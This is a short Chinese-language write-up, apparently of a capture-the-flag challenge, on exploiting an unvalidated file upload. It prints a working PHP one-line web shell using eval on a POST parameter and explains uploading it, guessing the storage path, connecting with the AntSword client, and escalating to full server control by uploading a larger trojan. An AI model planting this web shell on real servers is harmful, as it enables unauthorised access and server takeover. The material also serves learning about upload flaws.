文件上传漏洞最简单的就是上传小马,即一句话木马。
例如:
<?php @eval($_POST['hacker']);?>
在这简单的一句话中,将会引发巨大的影响,eval函数将会把括号里面的内容当成代码进行执行。
本题中无验证,那我们可以直接上传小马。
上传成功后他告诉了我们上传文件存储的相关路径,如果题目里面没有给出有关的路径,那我们就必须要去猜测文件路径,然后才可以用蚁剑进行连接。
这里连接的密码就是我们前面所写的一句话木马$_POST这个括号里面的内容。
连接成功我们就可以对这个网站路径下的所有内容进行查看、新建、删除的操作,接下来可以通过这个连接上传大的木马,以拿到服务器的最高权限